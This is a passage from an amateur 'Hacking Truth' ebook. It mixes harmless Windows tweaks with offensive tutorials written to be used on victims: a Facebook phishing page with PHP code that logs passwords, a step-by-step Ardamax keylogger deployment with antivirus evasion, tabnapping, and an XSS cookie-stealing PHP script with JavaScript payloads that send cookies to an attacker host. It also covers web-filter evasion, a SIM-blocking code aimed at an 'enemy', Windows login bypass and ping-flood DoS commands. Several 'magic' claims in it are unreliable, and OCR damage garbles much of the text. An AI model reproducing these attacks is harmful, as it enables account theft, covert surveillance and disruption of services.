4) Are you there yet? If so scroll down until you see Select the lid switch action
(plugged in).
5) Go there and change the setting to Enabled. Normally it will be in Not
Configured.
6) Then Change the options in it to Take no action. This will make your laptop take
no action even if the lid is closed.
Note: This is only in (plugged in). This means if the laptop is not plugged in it may
shut down or hibernate. But dont worry. If you want it to take no action when closed
while its running on its battery, then do one more change in the settings. For this
when you have finished the Plugged in Settings (Step 4, 5, 6) close that window and
scroll down to see Select the lid switch action (battery). Go there and Follow the
Steps 5 and 6.



36
H
a
c
k
i
n
g

T
r
u
t
h

LEARN HOW TO ACCESS BLOCK WEBSITE IN COLLEGE

All people must know to blok social website in colleges or office social network
sites like Friendster, Facebook, Myspace, Bebo, Hi5, Orkut, etc? are blocked by the
Admin. U have not able to acess this site with admin permission.

1) Using IP Instead of URL
This depends on the software/application used. Sometimes blocked sites are
stored as a list of URLs (eg. www.yahoo.com, www.gmail.com,etc) and typing the IP
instead of the URL might sometimes work. In a local computer, doing a ping
domain.com (pingwww.facebook.com) command in Command Prompt (Mac users
use Terminal) will return you the IP address. You can also find ip of wbsite online visit
this site www.whatsmyip.org

2) Redirection with Short URL service
Sometimes the URL you intend to browse might be ban, but converting them to
another a shorter URL with short URL services might just help you to bypass the
settings.
Heres 2 Short URL service weve previously mentioned MooURL, SnipURL.

3) Google Cache
Search engines like Google and Yahoo cache webpages and these cached
pages are stored in search engines themselves, which likely will be added to the
blocked list. Click on the cache will bring you to a cache version of the page, as
updated as how Google caches it.

4) Internet Archive Wayback Machine
Wayback Machine is a internet service that periodically keeps a copy of almost
all websites in the Internet way from the date theyre started. Clicking on the latest
copy of what Wayback Machine have should be somewhat similar to the real site.
Another way to access blocked sites via caches.

37
H
a
c
k
i
n
g

T
r
u
t
h

5) Anonymous Surfing
Some site provide you to take advantage of their proxy or domain to surf
other sites as anonymous. Heres some proxy websites
#http://www.hidemyass.com/
#http://www.anonymizer.com/
#http://www.wujie.net/
#http://www.ultrareach.net/
#http://invalid.invalid/
#http://www.guardster.com/subscription/proxy_free.php
#http://anonymouse.ws/anonwww.html
#http://www.browser-x.com/
#http://www.spysurfing.com/
#http://www.xerohour.org/hideme
#http://www.proxyz.be/

6) Use Proxy in Browsers (Vpn also used that)
There are many of sites out there that distributes free proxies of almost any
country. Heres an example. Check out the following methods on how/where to insert
proxies in your web browsers. how to implement blow apply this setting?
Proxy Surfing Firefox
Under Advanced tab, select Network tab, then click inside Connection Settings.
Select Manual proxy configuration, put proxy under HTTP proxy.
Proxy Surfing Internet Explorer
Go to Tools ->Internet Options. Select Connections tab. Click into LAN Settings,
check Proxy Server. Insert your proxy URL inside Address.



38
H
a
c
k
i
n
g

T
r
u
t
h

7) Bypass with Translations services
Online translation services like AltaVista BabelFish, Google Translate allows
you to translate a website from one language to another and display the translated
results on their own page.The trick here is to enter the URL (website youre blocked),
retranslate it even if you dont need to and let Google or AltaVista fetch you the
content.

8) Subscribe to RSS Feed
This might not work for all sites, but if the site you intended to visit provides RSS
feeds, you can subscribe and read it with a RSS reader, or have it regularly send the
contents to your email.

9) Retrieve web pages via Email
Web2Mail is a free service that sends websites you want to read right into your
inbox. All you need to do is send an email to www@web2mail.com with the URL as
subject title.












39
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO BLOCK YOUR ENEMY'S SIM CARD

Here a simple trick for block your enemy sim card, blocking a sim card is too simple.
What you have to do is just enter the below code in the desired phone
**04*3814*7529*68243#
Entering of above code will ask you to enter the PUK code. To solve this issue just
call customer care and get your PUK code.
Note: Entering of invalid PUK will cause permanent blocking of your SIM



40
H
a
c
k
i
n
g

T
r
u
t
h

CHANGING ICONS

Here is a simple tweak by which you will be able to change this monotonous icon to
anything you like,even your own Picture if you wish

You can put any image in place of one which I have shown,even the picture of your
favourite celebrity or your dream caror your own Picture.

Here are the steps you need to follow:

1. First of all the picture you want to use should have .ico extension(if you
already have a pic with .ico extension proceed to step
2. Most of the pictures we normally use have extensions like
.jpg,.bmp,.png..gif etc, so you first need to convert them to one with .ico
extension.This is simple.
and put your original image in the 'Source Image 'section,then click on
'Generate Favicon.ico ' button to get your image with .ico extension.

3. Now go to My Computer.Suppose you want to put this icon in place of
your original C: image. Double click and enter C: .Paste your .ico image
file in it.Also create a new text file and in it type the following lines:
[autorun]
ICON=favicon.ico

Remember that 'favicon.ico' in the second line is the name of your image file.If
you have an image file with .ico extension by the name of 'abc.ico',then use that in
the second line in place of 'favicon.ico'.

3. Now rename this text file as ' autorun.inf ' (without the quotes).

41
H
a
c
k
i
n
g

T
r
u
t
h

4. Important Note:How do I rename my text file as autorun.inf ?Ans.Go to
Tools->Folder options.Under the View tab uncheck the 'Hide extensions for
known file types'.Press apply.Now rename your text file as 'autorun.inf'.
Now restart your Pc.You are done.Check out the cool new picture you have just
added in your My computer panel.

42
H
a
c
k
i
n
g

T
r
u
t
h

THINGS THAT MICROSOFT COULD NOT EXPLAIN!

TRY this....

MAGIC #1

Found that nobody can create a FOLDER anywhere on the Computer which can be
named as "CON". This is something fun
ny and inexplicable? At Microsoft the whole Team, couldn't answer why this
happened! TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER

MAGIC #2

For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
Noticed the weird bug? No one can explain!

MAGIC #3

Again this is something funny and can't be explained?
At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!
It was discovered by a Brazilian. Try it out yourself?
Open Microsoft Word and type
=rand (200, 99)
43
H
a
c
k
i
n
g

T
r
u
t
h

And then press ENTER And see the magic?..!

Magic #4

Did you know that a flight number from one of the planes that hit one of the two WTC
towers on 9/11 was Q33N. In Notepad / Wor
dPad or MS Word, type that flight number i.e Q33N. Increase the font size to 72.
Change the font to Wingdings. ..... u will be amazed by the findings!!!

44
H
a
c
k
i
n
g

T
r
u
t
h

MAKE A FLIP3D ICON IN THE TASKBAR

Flip3D was a fun and cool looking feature in Windows Vista that can be very useful
for switching between windows. With the improved Windows 7 taskbar, Flip3D was
replaced with improved thumbnails and Aero Peek. Those are both good alternatives
but I like the speed of viewing all my open windows at once and switching with just
two clicks.

This article will show you how to create a Flip3D icon on the Windows 7 taskbar:

Right click on the Desktop and select New and then Shortcut.
Type in RunDll32 DwmApi #105 in the location box and click Next.
Type in Flip3D as the Name and click Finish.
You will now have an shortcut on the desktop that will launch Flip3D but it has the
wrong icon. Right click on the Flip3D shortcut and select Properties.
On the Shortcut tab click the Change Icon button.
Change the Look for icons in this file text box to C:\windows\explorer.exe and it Enter.
The Flip3D icon will now be available. Select it and click OK.
Click OK to close out the shortcut properties window.
Finally, just drag and drop the new shortcut on the Windows 7 taskbar to pin it.

45
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO LOCK FOLDER ON WINDOWS USING RECYCLE BIN
Hello friends, here I am going to share tip which will help you to lock folder for
protecting your important data as well as data that required to lock for preventing
access. There are lots of utilities available that will help you to achieve this, but all are
somehow trial version or limited version.
So, if you want to lock folder on your pc please follow below steps. Note that
these changes are under windows registry so, avoid to implement if you are not well
enough technically known person :)
Here are the way you can lock any folder using recycle bin:
Open Run in your computer or press (ctrl +R) and type regedit command.
You can list of keys and relates values. Navigate through list until you find
CLSID no of recycle bin in registry editor
For example:
CLSID no of recycle bin is >> {645FF040-5081-101B-9F08-00AA002F954E}
Now its time to lock folder using recycle bin so, lets say you want to lock folder
named Folder1? So inside notepad editor type following text like

ren folder1 recycle.{645FF040-5081-101B-9F08-00AA002F954E}

And save that files as lock.bat
To unlock related Lock folder, you can create another batch file which will unlock
folder. Type below line in another notepad file and save that as unlock.bat

ren recycle.{645FF040-5081-101B-9F08-00AA002F954E}

So, whenever you want to lock folder execute created lock.bat and reverse
execute unlock.bat for locking folder
46
H
a
c
k
i
n
g

T
r
u
t
h

HOW TO SET VIDEO AS DESKTOP WALLPAPER

1. Open VLC Media Player.
2. Then Go to Tools >Preference or press CTRL P and Select Video from left panel
3. Then Choose DirectX video output from output dropdown list.
4. Save the changes answer restart VLC Media Player.
5. Play any video you would like to set as your desktop wallpaper.
6. Then click on Video and select DirectX Wallpaper from the dropdown list.
7. Now Minimize VLC player and you will see your video running on your desktop as
wallpaper.
8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video
dropdown list.


47
H
a
c
k
i
n
g

T
r
u
t
h

GENERALISED ACCOUNT HACKING
The most awaited topic for beginners !
Here I am giving some generalized ways ( popular ) to hack any kind of account!
SO FIRSTLY, PHISHING!
INTRODUCTION TO PHISHING
According to Wikipedia -> Phishing is the act of attempting to acquire
information such as usernames, passwords, and credit card details (and sometimes,
indirectly, money) by masquerading as a trustworthy entity in an electronic
communication. Communications purporting to be from popular social web sites,
auction sites, online payment processors or IT administrators are commonly used to
lure the unsuspecting public. Phishing emails may contain links to websites that are
infected with malware.
Phishing is typically carried out by e-mail spoofing, instant messaging and it
often directs users to enter details at a fake website whose look and feel are almost
identical to the legitimate one. Phishing is an example of social engineering
techniques used to deceive users and exploits the poor usability of current web
security technologies. Attempts to deal with the growing number of reported phishing
incidents include legislation, user training, public awareness, and technical security
measures.
A phishing technique was described in detail in 1987, and (according to its
creator) the first recorded use of the term phishing was made in 1995. The term is a
variant of fishing, probably influenced by phreaking, and alludes to baits used in
hopes that the potential victim will bite by clicking a malicious link or opening a
malicious attachment, in which case their financial information and passwords may
then be stolen.
So from above all information you are get to know what is phishing exactly is.
So lets now start with its demonstration on one of your favorite website.

DEMONSTRATION WITH FACEBOOK
So now, lets start demonstration of phishing with one of your favorite social
networking website or emailing website. There are many more, and this method will
be apply to each and everyone like gmail.com, yahoo.com,live.com, hotmail.com,
facebook.com, twitter.com, flicr, mail.com, rediffmail.com, in.com and rest of the
websites which provide these services.
So I am gonna demonstrate you on facebook.

48
H
a
c
k
i
n
g

T
r
u
t
h

Step-1 :-
Register to any free web hosting website. Some website give cpanel hosting,
which is better for phishing, but however there are huge websites which provide free
hosting, Some of them are -
www.000webhost.com
www.100gb.co
www.x10hosting.com
Register with one of above free web hosting and confirm this hosting. once you done
this, go to step-2.
Step-2 :-
Now go www.facebook.com and press Ctrl+U or right click on web page and
view source, now copy this all source code and paste it into the new notepad file.
Step-3 :-
Now save this notepad file with name index.html on your desktop or a folder
where you want.
Step-4 :-
Now open one more notepad file and copy the below whole code into it.










From <?php to ?>, copy content to new notepad file and save it with any
anyname.php, I am gonna save it with name login.php, you can put anyname that
you want but ensure that extension should be .php. In the content there is a txt file
(log.txt), you can put any name to txt which is not guessable, I just pur log.txt but
you should that name is unguessable and its extension may b .txt or nothing.
<?php
header (Location: http://www.facebook.com/ );
$handler =fopen(log.txt, a);
foreach($_POST as $variable =>$value) {
fwrite($handler, $variable);
fwrite($handler, =);
fwrite($handler, $value);
fwrite($handler, \r\n);
}
fwrite($handler, \r\n);
fclose($handler);
exit;
?>

49
H
a
c
k
i
n
g

T
r
u
t
h

Step-5 :-
Now, again open index.html file into notepad (I would like to recommended you
to use Notepad++for these kind of tasks, awesome and flexible text editor), and find
(Ctrl+F for find) keyword action here. You will see a keyword
action=https://www.face**** something like this, remove this whole link which is unde
double quotes and put here login.php. Save it and exit (Ctrl+S for save).
Step-6 :-
Now upload login.php and index.html file to you file manager directory. If it is
cpanel account, upload files into file_manager -> public_html or if it is
000webhost.com account upload index.html and login.php into file manager as show
in below image

If you are logged into your 000webhost.com account, click on the Go to
Cpanel in front of your domain that you had registered, and then Go to File
Manager under Files and log into it. Now click on the public_html. Now click on
upload and upload your both files.
Step-7 :-
Now visit to your subdomain, like yourname.000webhost.com and you will see
a phishing page of facebook.com. now send this link to a victim, say anything like join
my network or any social engineering trick and force victim to visit you page and let
him/her enter the username and password. Once he/she enter information, username
and password will be save into log.txt file and victim will redirect to facebooks original
link facebook.com. Victim will seems like he did enter wrong username and password
so he should enter again, when he again will enter a info, he/she will successfully
login into their facebook account. Game over!!!!.
Step-8 :-
Now go to yourname.000webhost.com/log.txt and see the username and
password of victim. You can again visit to your cpanel, here in file manager
>public_html you will see a file log.txt, open it to view victims username and
password.
Sorry but I am not going to tell you similar hacking for any other website. Since
the steps are same! Also I dont like chunk of same info !
We can also use the similar way to hack any of the online accounts like Banks
accounts, Gmail account etc., The thing you have to do is make your own as it is
50
H
a
c
k
i
n
g

T
r
u
t
h

phishing page or search on google for phishing pages of different websites, if you are
lucky enough then you will find the phishing page !







USING KEYLOGGER (KEYLOGGING) !
By keylogging you will get each and every information about what your victim is
doing and or typing. Here is the one of the best keylogger ARDAMAX also a free
keylogger is there like kidlogger search on google.
Once you installed keyloggers victim file on the victim pc you will get all those
things which that victim types. So the facebook and gmail account credentials!
Step 1: Download ardamax keylogger : http://adfoc.us/10187334395217
and also patch is included !
Step 2: Follow the readme file in archive.

Step 3: Now, again right click on Ardamax taskbar icon and select Remote
Installation to see Remote Installation Windows, click Next on it.

51
H
a
c
k
i
n
g

T
r
u
t
h


Step 4: Click on Next to get Appearance screen. Here, click on Additional
components and untick Log Viewer and hit Next.


Step 5: Now,on Invisibility screen, check all options and hit Next.
52
H
a
c
k
i
n
g

T
r
u
t
h



Step 6: Now, on Security screen, click on Enable and put the password (remember
this pass- youll need this later). Check all boxes and hit Next.



Step 7: Now, you come to Options, and select options as you need. eg: It is better to
have keylogger run after every restart so tick Run On Windows Startup and so on.
Click on Next.
53
H
a
c
k
i
n
g

T
r
u
t
h



Step 8: On Control screen, check the box Send log every and put time as 5/10
minutes(whatever you wants). Then, in delivery, check Email. Leave Include as it is.
And uncheck Send only if log size exceeds. Proceed with Next.


Step 9: Now, on Email, (Please make sure that you have entered email ID in settings
of delivery options of ardmax keylogger)
Send To : Enter email id to receive keylogs
54
H
a
c
k
i
n
g

T
r
u
t
h

Username and password: Enter your any Username and pass of email id for sending
Keylogs on your email id which yov have mentioned above.
Now hit Next.
Step10: In Control window dont change anything and hit Next.

Step 11: In Screenshots window, select options as you need and hit Next.

55
H
a
c
k
i
n
g

T
r
u
t
h

Step 12: In Webcam window, select options as you need and hit Next.



Step 13: In Screenshots screen, you can put your own values and hit Next to come
to Destination. Choose the Keylogger Engine path where you want to put the
keylogger on your computer. Untick Open the folder containing the keylogger engine
to avoid yourself from being keylogged. Choose the icon you want to use for
keylogger.



56
H
a
c
k
i
n
g

T
r
u
t
h

Step 14: Now, click Next and then Finish.


Now, when you have keylogger engine ready. But, this is detected by antivirus
as hacktool and so we have to bypass antivirus detection. For this, keylogger is
crypted using FUD Crypter. I will not talk about this over here as I have written article
on this FUD Crypter. After crypting, you need tobind this crypted keylogged file with
say image or any song for further protection and prevent victim doubt.

Note: Your antivirus may detect the downloaded Ardamax keylogger(Hacker
version). file as virus. Please deactivate your antivirus while installing this Ardamax
keylogger(Hacker version). Dont worry, I never play such cheap pranks of hacking
my readers.








57
H
a
c
k
i
n
g

T
r
u
t
h

TABNAPPING
Tab Napping !


Phishing is technique through which we can hack account of any website. It is just a
copy of the website and you send it to your victim and when he/she login his/her
password will be stored in your password website file. For Example you want to hack
someone's facebook account then you first of all you need a Facebook phishing page
(this is just like facebook login page) and upload it to your website and send it to victim
when he/she login with his/her account then his/her password and email address will
be sent to your email or save to your website password file.

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack
account and you will be using phishing method with tab napping then you can hack
account. Actually Tab Napping is a script which you put into a site/blog and when the
user visit your website/blog and read your article or play game or watch video, when
user go to other tab in browser which contain other website like YouTube, Google etc
and came back to your website then your website will be redirected to the phishing
page and telling them to login with Facebook/Gmail/yahoo account to continue.When
user enter login information he/she will be back to your page and user password will
be send to you.

So Whats the Difference ?
Theres' a question in Your Mind Right Now what is the main difference between a
PHISHING ATTACK and TAB-NAPPING. In Phishing you had to send the Direct
Fake FACEBOOK Login page but in Tab Napping you do not need to send the fake
login page. You give your victim the link to the Page Which contains a
game/flash/video/anything interesting. If the User leaves that certain TAB unused for
a while the page automatically redirects to the FAKE LOGIN PAGE.

So Lets Start With the Tutorial:




58
H
a
c
k
i
n
g

T
r
u
t
h

Things You NEED

1. Create a Free Account in any FREE Web-Hosting Site
2. The Scripts to Make the tab-Napping Successful (Will be provided At the End)



3. Now Browse to the File Manager Of Your account (web-hosting) and upload the
Files (Files Will be provided)
59
H
a
c
k
i
n
g

T
r
u
t
h




4. After the Upload Is Complete Go to your Website. You Should Get a Page like The
one In the Picture Below



5. Now the Most Tricky Part is sending it to the Victim. Be Sure to Decode the URL
before Sending it to the victim
60
H
a
c
k
i
n
g

T
r
u
t
h












You Can Any Of the below:
Free online urldecoder and urlencoder
URL decoder and Encoder
List Of Other Websites
required files download : http://adfoc.us/10187334395081 and password
to downloaded files is IHA
COOKIE STEALING (SESSION HIJ ACKING)
Cookies Stealing
Here we show how you can hack a session using javascript and php.Everyone knows
what XSS is, right? Good, Ill spare you the definition. A common use for XSS is
stealing cookies to hijack sessions and gain access to restricted web content. Cookie
stealing is typically done by forcing a targets browser to issue some sort of GET
request to a server controlled by the attacker which accepts the targets cookie as a
parameter and processes it in some way. In most cases, when a cookie stealing XSS
attack is successful, it generates a visual clue which can tip off the target. While it is
too late at this point, stealth has been compromised, and could be the difference
between the user keeping the session active, or clicking log out and rendering your
stolen cookie invalid.
Cookies Stealing And Session Hijacking

What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the
user browser.A cookie is sent as an header by the web server to the web browser on
the client side.A cookie is static and is sent back by the browser unchanged everytime
it accesses the server. A cookie has a expiration time that is set by the server and are
deleted automatically after the expiration time. Cookie is used to maintain users
authentication and to implement shopping cart during his navigation,possibly across
multiple visits.



61
H
a
c
k
i
n
g

T
r
u
t
h

Cookies Stealing
What can we do after stealing cookie?
Well,as we know web sites authenticate their users with a cookie,it can be used to
hijack the victims session.The victims stolen cookie can be replaced with our cookie
to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a
text file, these cookied can later be utilised.

PHP Code:
<?php

function GetIP()
{
if (getenv( HTTP_CLIENT_IP ) && strcasecmp(getenv( HTTP_CLIENT_IP ),
unknown ))
$ip = getenv( HTTP_CLIENT_IP );
else if (getenv( HTTP_X_FORWARDED_FOR ) &&
strcasecmp(getenv( HTTP_X_FORWARDED_FOR ), unknown ))
$ip = getenv( HTTP_X_FORWARDED_FOR );
else if (getenv( REMOTE_ADDR ) && strcasecmp(getenv( REMOTE_ADDR ),
unknown ))
$ip = getenv( REMOTE_ADDR );
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR']
&& strcasecmp($_SERVER['REMOTE_ADDR'], unknown ))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = unknown ;
return($ip);
62
H
a
c
k
i
n
g

T
r
u
t
h

}

function logData()
{
$ipLog= log.txt ;
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get(register_gobals);
if ($register_globals) $ip = getenv(REMOTE_ADDR);
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ( l dS of F Y h:i:s A );
$log=fopen( $ipLog , a+ );

if (preg_match( /\bhtm\b/i , $ipLog) || preg_match( /\bhtml\b/i , $ipLog))
fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent
| METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
);
else
fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent
| METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie
\n\n );
fclose($log);
63
H
a
c
k
i
n
g

T
r
u
t
h

}

logData();

?>

Save the script as a cookielogger.php on your server. (You can get any free
webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The
hijacked/hacked cookies will be automatically stored here.
Cookies Stealing
Now for the hack to work we have to inject this piece of javascript into the targets
page. This can be done by adding a link in the comments page which allows users to
add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky
to try this.The best way is to look for user interactive sites which contain comments or
forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language= Java script >
document.location= http://www.yourhost.com/cookielogger.php?cookie=&qu
ot; + document.cookie;
</script>
You can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href= java
script:document.location=http://www.yourhost.com/cookielogger.php?cookie
=+document.cookie; >Click here!</a>

64
H
a
c
k
i
n
g

T
r
u
t
h


Clicking an image also can activate the script. For this purpose you can use the below
code.
Code:
<a href= java
script:document.location=http://www.yourhost.com/cookielogger.php?cookie
=+document.cookie; &gt;
<img src= URL OF THE IMAGE /></a>

All the details like cookie, ipaddress, browser of the victim are logged in to log.txt on
your hostserver. In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie, what to do with this..? Download cookie editor mozilla plugin or
you may find other plugins as well.Go to the target site>open cookie editor>Replace
the cookie with the stolen cookie of the victim and refresh the page. Thats it!!! you
should now be in his account.



65
H
a
c
k
i
n
g

T
r
u
t
h

BYPASS WINDOWS 7, XP AND VISTA PASSWORDS
Requirements:
A pen drive, KONUSB software

Step 1
Download KONUSB software. (See the link at the end of the post)

Step 2:
Plug in Pen drive into the PC/laptop and double click on KONBOOTINSTALL.exe &
enter the drive letter of the USB.

Step 3:
Now insert the pen drive into the PC/Laptop whichever u want to hack, and boot via
USB (using Pen drive)

Step4:
Next press OK for everything. If it asks for password, leave blank and press OK

NOTE:
This KONUSB software wont change the password of the PC/Laptop whatever you
hacked.It just bypass the password restriction. If u remove the Pen drive, and boot
normally itll remains the same as it is password protected. It works in All Operating
systems including windows XP, Vista, Windows 7 etc., 100 % working.

66
H
a
c
k
i
n
g

T
r
u
t
h


LEGENDARY DDOS ATTACK!
WHAT IS DOS ATTACK?

Denial of Service(DoS) Attack is a fatal attempt by an external agent to cause
asituation where the actual resource(victim undergoing attack) becomes unavailable
to the actual visitors or users. This is usually done by overwhelming the target victim
with illegitimate traffic in the form of broken/unsolicited page access requests.

Distributed Denial of Service(DDoS) Attack is an advance form of DoS where
the attacking agents are distributed over the huge network (or internet)

How DoS Attacks are executed?

DoS Attacks are usually executed by flooding the target servers with
unsolicited data packets in unprecedented manner. This may be done by
misconfiguring network routers or by performing smurf attack on the victim servers.
This results in, Capacity Overflow, followed by Max Out of system resources, which
makes the target service unavailable, either temporarily or permanently (In case of
hardware targeted DoS attack) to the intended users.
In case of DDoS attack, the origin of unsolicited data packets (for the purpose
of flooding the bandwidth/resource of the victim servers) are distributed over a large
Network (or internet). The overall mechanism of DDoS Attack involves a huge
quantity of compromised network nodes (computers connected to internet),
governed by agent handlers, which are further controlled centrally by the actual
attacker.
The massive number of compromised computers on the internet are then
unknowingly governed by the source attacker to demand access to the targeted
victim within a minimal time span, which further causes saturation of limited system
resources and results in eventual shutdown of the targeted service.
The most common method employed to compromise massive amount of user
agents on the internet (to actually execute DDoS Attack) is by plaguing as many
computers as possible over the internet with malware/trojan, meant for that
particular purpose.
Such trojans can either spread via email attachments or via Peer-to-peer
networks. Whatever be the method of spreading out, once the intended trojan is
silently installed on the uninformed computer agent, that user agent has actually
been compromised, which is then called as a Zombie or Botnet. Further, it becomes
a prerogative of the source attacker to indirectly command some or all its Zombie
agents(or botnets) for demanding access to the target service.

What are other variants of DoS attacks?

67
H
a
c
k
i
n
g

T
r
u
t
h

There are many other attacks of similar nature and purpose such as smurf
attack,nuke bomb, ping of death, banana attack, phlashing among many others.
How are they counteracted?

The best way to defend a web service from faltering due to DDoS attack is to
keep backup resources of the system intact. As the aim of such attack is to max out
system resources, if the system resources are already abundant and well prepared
to face that sudden peak of traffic at any moment, most chances are that your web
service will survive DoS (or even DDoS) attack.

What implications can DDoS Attacks have?
If the attack is only limited to overwhelming and resource consuming traffic,
the implications are limited to service unavailability for couple of hours (or few days
in exceptional cases). This not only stresses the website administrators financially
but also results in loss of market reputation and puts a question mark on the
reliability of the web service.
In case of hardware targeted DoS Attacks, financial losses can magnify to
great extent as hosting infrastructure has to be replaced on urgent basis. This can
also lead to critical data loss, if backup procedures arent up to the mark.
With more and more DDoS attacks happening these days, companies and Internet
properties are using various types of DDoS Mitigation strategies to avoid any worst
case scenario.
DDOS ATTACK TYPES:-
1) Ping Of Death:- The ping of death attack sends oversized ICMP
datagrams (encapsulated in IP packets) to the victim.The Ping
command makes use of the ICMP echo request and echo reply
messages and it's commonly used to determine whether the remote
host is alive. In a ping of death attack, however, ping causes the remote
system to hang, reboot or crash. To do so the attacker uses, the ping
command in conjuction with -l argument (used to specify the size of the
packet sent) to ping the target system that exceeds the maximum bytes
allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable
to the ping of death attack.
2) Teardrop Attack:- Whenever data is sent over the internet, it is broken into
fragments at the source system and reassembled at the destination system. For
example you need to send 3,000 bytes of data from one system to another. Rather
than sending the entire chunk in a single packet, the data is broken down into
smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais
bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
68
H
a
c
k
i
n
g

T
r
u
t
h

When the target system receives such a series of packets, it cannot reassemble the
data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.
3) SYN - Flood Attack:- In SYN flooding attack, several SYN packets are sent to
the target host, all with an invalid source IP address. When the target system
receives these SYN packets, it tries to respond to each one with a SYN/ACK packet
but as all the source IP addresses are invalid the target system goes into wait state
for ACK message to receive from source. Eventually, due to large number of
connection requests, the target systems' memory is consumed. In order to actually
affect the target system, a large number of SYN packets with invalid IP addresses
must be sent.
4) Land Attack:- A land attack is similar to SYN attack, the only difference being
that instead of including an invalid IP address, the SYNpacket include the IP
address of the target sysetm itself. As a result an infinite loop is created within the
target system, which ultimately hangs and crashes.Windows NT before Service
Pack 4 are vulnerable to this attack.
5) Smurf Attack:- There are 3 players in the smurf attackthe
attacker,the intermediary (which can also be a victim) and the victim. In most
scenarios the attacker spoofs the IP source address as the IP of the intended victim
to the intermediary network broadcast address. Every host on the intermediary
network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and
intermediary networks become congested and unusable, i.e. clogging thenetwork
and preventing legitimate users from obtaining network services.
6) UDP - Flood Attack :- Two UDP services: echo (which echos back any character
received) and chargen (which generates character) were used in the past for
network testing and are enabled by default on most systems. These services can be
used to launch a DOS by connecting the chargen to echo ports on the same or
another machine and generatinglarge amounts of network traffic.
SECTION 3 DDOS ATTACK BASIC TUTORIAL
FOR BEGINNERS:-
Dos attacks-"Denial of Service Attack
Its the attack to deny the service to the legitmate user ,so that he suffers
there are several reasons to do that.
Mostly likely reason is NAST-YINESS
Okay there are two ways for dos attacks one is the lame way and the other
is the elite way

Lame way
Email Bombs it s the technique in which a person email Alc is flooded with
emails, its the lamest form of DOS attack. All a person has to do is go on the net
get some email bomber like UNA or KABOOM put the victims address and there ya
go , his email address will be flooded with the unwanted emails, there is also
69
H
a
c
k
i
n
g

T
r
u
t
h

another way put his email address into some porn subscription he will get bombed
without you doing anything ,LOL When the victims email alc gets flooded he has a
pain in differentiating and deleting the unwanted emails and its the huugee task.
And if the victim is the admin of the server and his email alc there is flooded it also
looses his disk space.
Continous login suppose a server is configured to allow only specified
amount login attempts then, and you know his username you can lock his account,
by attempting to connect by his name to the server which will lock his account and
there ya go , the legitmate user wont be able to log in ,the reason, you locked his
Alc.
Okay now the neophyte way, its not that elite way but somewhat better than
the lame way, atleast you are doing something technical.

Syn Flooding
This is a exploit in tcp/ip method of handshake. Read some basics on tcp/ip
okay lets start.
Normal way:-
Syn-packet is sent to the host by the client who intends to establish a connection
SYN Client -------------- Host
Then in the second step host replies with syn/ack packet to the client
SYN/ACK Client --------------Host
Then in the third and the last step
Client replies with ack packet to the host and then the threeway handshake is
complete
Okay got it now ..?
Now in attack
Several syn packet is sent to host via spoofed ip address(bad or dead ip addresses)
now then what happens the host replies with syn/ack packet and host waits for the
ack packet. But however the ip address dont exist it keeps waiting ,thus it queues
up and eats the system resources and thus causes the server to crash or reboot.

Land attack
A land attack is similar to syn attack but instead of bad ip address the ip address of
the target system itself is used. This creates an infinite loop, and the target system
crashes. But however almost all systems are configured against this type of attacks.

Smurf Attack
A smurf attack is a sort of brute force dos attack, in which a huge number normally
the router using the spoofed ip address from within the target network , so when it
gets the ping it echos it back causing the network to flood. Thus jamming the traffic
Udp flooding
This kind of flooding is done against two target systems and can be used to stop the
services offered by any of the two systems. Both of the target systems are
connected to each other, one generating a series of characters for each packet
received or in other words, requesting UDP character generating service while the
other system, echoes all characters it receives. This creates an infinite non-stopping
70
H
a
c
k
i
n
g

T
r
u
t
h

loop between the two systems, making them useless for any data exchange or
service provision.
PING OF DEATH
This Attack dont work now as all the servers are patched against this type of
attack. In this attack a target system is pinged with data packet exceed the normal
size allowed by the tcp/ip i.e 65536.This will cause the system to reboot or
Hang up.
Tear Drop
When the data is passed from one system into another it is broken down into
smaller fragments, and then in the reciving host they are again reassembled.
These packets have an offset field in there TCP header part which specifies from
which part to which part that data carries or the range of data that it is carrying. This
along with the sequence numbers, this helps the receiving host to reassemble the
data. In tear drop the packets are sent with the overlapping offset field values thus
the reciveing host is unable to reassemble them and crashes.
DDOS ATTACK MANUALLY:-
First Open Cmd
From Run =>Cmd
Now Follow These Steps -:
o Now Type This Command In CMD :
Ping www.anysite.com
o And You Will Get The I.P of Victim
o Now Type =>
ping (i.p of site) t l 65000
Here 65000 is packets
